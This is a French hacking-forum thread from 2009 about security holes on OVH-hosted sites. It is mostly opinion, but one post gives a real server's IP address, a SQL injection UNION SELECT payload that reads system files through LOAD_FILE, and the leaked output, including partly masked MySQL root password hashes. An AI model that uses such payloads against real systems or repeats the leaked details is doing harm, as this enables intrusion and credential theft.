Test d'un site.
29 posts
• Page 2 of 2 • 1, 2
by CASH » Tue Mar 24, 2009 4:57 pm
[quote:53cb124fb7="Sliim"]ça va beaucoup l'aider ça dis donc ..
Tu pourrais préciser, ou alors MP DANN pour lui expliquer. Mais là ton up n'a aucun intérêt.. A éviter donc..
[u:53cb124fb7]Sliim[/u:53cb124fb7][/quote:53cb124fb7]
je part du principe que quelqu un qui demande une aide, peut au moins venir verifier son sujet de temps en temps ,
apres on peut discuter ...
aucun interet? bah ecoute si tu le dit , j eviterai a l avenir
Tu pourrais préciser, ou alors MP DANN pour lui expliquer. Mais là ton up n'a aucun intérêt.. A éviter donc..
[u:53cb124fb7]Sliim[/u:53cb124fb7][/quote:53cb124fb7]
je part du principe que quelqu un qui demande une aide, peut au moins venir verifier son sujet de temps en temps ,
apres on peut discuter ...
aucun interet? bah ecoute si tu le dit , j eviterai a l avenir
- CASH
- Projets
- Posts: 42
- Joined: Wed Jan 28, 2009 2:58 pm
Re: !!
by Korigan » Tue Mar 24, 2009 5:54 pm
[quote:68fb1f4fa9="CASH"]completement faillible ! une vrai passoir :?
:o :o[/quote:68fb1f4fa9]
Pour faire simple, [b:68fb1f4fa9]ovh[/b:68fb1f4fa9] suivrait la même politique que free, et refuserait de corriger une faille dont la portée est identique à celle présente chez free sous prétexte que peut de personnes savent l'exploiter.
J'utilise le conditionnel, car personnelement, je ne veux plus entendre parler de ces [b:68fb1f4fa9]voleurs[/b:68fb1f4fa9], n'ai pas testé moi même sur ovh, et s'ils ont des problèmes, qu'ils les règlent eux même...il seront forcemment obligé de réagir un jour ou l'autre.
:o :o[/quote:68fb1f4fa9]
Pour faire simple, [b:68fb1f4fa9]ovh[/b:68fb1f4fa9] suivrait la même politique que free, et refuserait de corriger une faille dont la portée est identique à celle présente chez free sous prétexte que peut de personnes savent l'exploiter.
J'utilise le conditionnel, car personnelement, je ne veux plus entendre parler de ces [b:68fb1f4fa9]voleurs[/b:68fb1f4fa9], n'ai pas testé moi même sur ovh, et s'ils ont des problèmes, qu'ils les règlent eux même...il seront forcemment obligé de réagir un jour ou l'autre.
-
Korigan - Site Admin
- Posts: 1781
- Joined: Tue May 29, 2007 6:57 pm
by jeyy » Wed Mar 25, 2009 11:51 am
si OVH étaient aussi vulnérables , ca se saurait. quand je vois le nombre de sites hébergés chez eux , je doute qu'ils ne soient pas au top point de vu sécuritée.
ou alors faudrait un peu expliquer de quoi il est question :?:
ou alors faudrait un peu expliquer de quoi il est question :?:
-
jeyy - Projets
- Posts: 113
- Joined: Tue Mar 25, 2008 11:20 am
by Korigan » Wed Mar 25, 2009 5:23 pm
[quote:ad5fbde9be="jeyy"]quand je vois le nombre de sites hébergés chez eux , je doute qu'ils ne soient pas au top point de vu sécuritée.[/quote:ad5fbde9be]
Tes doutes sont compréhensible, mais tu sais, même de grosses institution se font pirater. (Nasa, maison blanche, fbi). Ton argument montre qu'ils ont plus de moyens, mais la sécurité absolu n'existe pas, et en général, plus il y a de services offert, plus il y a de failles, et OVH offre beaucoup de services ^^
Si l'on prends le cas de Free, je dirais que niveau architecture, ils sont comparable à ovh, et d'expérience, je peux t'assurer qu'ils ont la même politique question sécurité.
Je ne dis pas que c'est un problème qui ne les intéresse pas, mais lorsque le coût dépasse les bénéfices-les pertes, ils remettent à plus tard ce qui pourrait se régler immédiatement.
Tes doutes sont compréhensible, mais tu sais, même de grosses institution se font pirater. (Nasa, maison blanche, fbi). Ton argument montre qu'ils ont plus de moyens, mais la sécurité absolu n'existe pas, et en général, plus il y a de services offert, plus il y a de failles, et OVH offre beaucoup de services ^^
Si l'on prends le cas de Free, je dirais que niveau architecture, ils sont comparable à ovh, et d'expérience, je peux t'assurer qu'ils ont la même politique question sécurité.
Je ne dis pas que c'est un problème qui ne les intéresse pas, mais lorsque le coût dépasse les bénéfices-les pertes, ils remettent à plus tard ce qui pourrait se régler immédiatement.
-
Korigan - Site Admin
- Posts: 1781
- Joined: Tue May 29, 2007 6:57 pm
by ZADYREE » Thu Mar 26, 2009 5:29 pm
Je vous donne mon analyse en ce qui concerne les serveurs OVH. Vous savez qu'installer UN serveur est une procédure assez longue, incomparable à celle que nous utilisons avec LAMP (ou WAMP sous w32). Ceci étant, chaque serveur de leur millier de machines a été installé et updaté à différents moments. Celà veut dire que certains serveurs sont extrèmement sécurisés, car up-to-date, mais ça n'est pas le cas de tout le monde, bien au contraire. Le site de mon établissement est hébergé sur un OVH qui utilise PHP4... Quelle honte, sachant qu'ils ont oublié de restreindre l'accès à plusieurs fichiers et dossiers (du style php.ini, /etc/passwd , etc...)
Last edited by ZADYREE on Thu Mar 26, 2009 6:48 pm, edited 1 time in total.
-
ZADYREE - Projets
- Posts: 136
- Joined: Sat Dec 06, 2008 1:26 pm
- Location: Near eip
ya
by CASH » Thu Mar 26, 2009 6:30 pm
ya egalement un probleme ici :?
http://87.98.162.173/mdjt/index.php?page=6
Database: mdjt
User: root@localhost
Version: 5.0.51a-3ubuntu5.3
localhost:root:*xxxxxx19071811CFF511D2E00A2B2D872019EB
12361.ovh.net:root:*xxxxxxF19071811CFF511D2E00A2B2D872019EB
127.0.0.1:root:*xxxxxx3F19071811CFF511D2E00A2B2D872019EB
] localhost:N:U
] r12361.ovh.net:N:U
localhost:debian-sys-maint:*5842B3E0E66368F098405F74C5D3FA7E1Cxxxxxx
http://87.98.162.173/mdjt/index.php?page=6+AND+1=2+UNION+SELECT+1,2,LOAD_FILE(0xxxxxxx),LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),6--
http://87.98.162.173/mdjt/index.php?page=6
Database: mdjt
User: root@localhost
Version: 5.0.51a-3ubuntu5.3
localhost:root:*xxxxxx19071811CFF511D2E00A2B2D872019EB
12361.ovh.net:root:*xxxxxxF19071811CFF511D2E00A2B2D872019EB
127.0.0.1:root:*xxxxxx3F19071811CFF511D2E00A2B2D872019EB
] localhost:N:U
] r12361.ovh.net:N:U
localhost:debian-sys-maint:*5842B3E0E66368F098405F74C5D3FA7E1Cxxxxxx
http://87.98.162.173/mdjt/index.php?page=6+AND+1=2+UNION+SELECT+1,2,LOAD_FILE(0xxxxxxx),LOAD_FILE(0x2f6574632f686f737473),LOAD_FILE(0x2f6574632f686f737473),6--
- CASH
- Projets
- Posts: 42
- Joined: Wed Jan 28, 2009 2:58 pm
by TorTukiTu » Thu Mar 26, 2009 6:57 pm
Jolie exploitation Cash, je me suis permis de modifier un peu ta requête pour pas que des petits crétins puissent l'exécuter.
On ne sais jamais avec tous les boulets qui trainent ces temps-ci.
La tortue.
On ne sais jamais avec tous les boulets qui trainent ces temps-ci.
La tortue.
-
TorTukiTu - Site Admin
- Posts: 1960
- Joined: Thu Feb 07, 2008 10:24 pm
- Location: Devant son pc durant la redaction de ce message
29 posts
• Page 2 of 2 • 1, 2
Return to Faites tester vos sites <b>DE TEST</b>
Who is online
Users browsing this forum: No registered users and 5 guests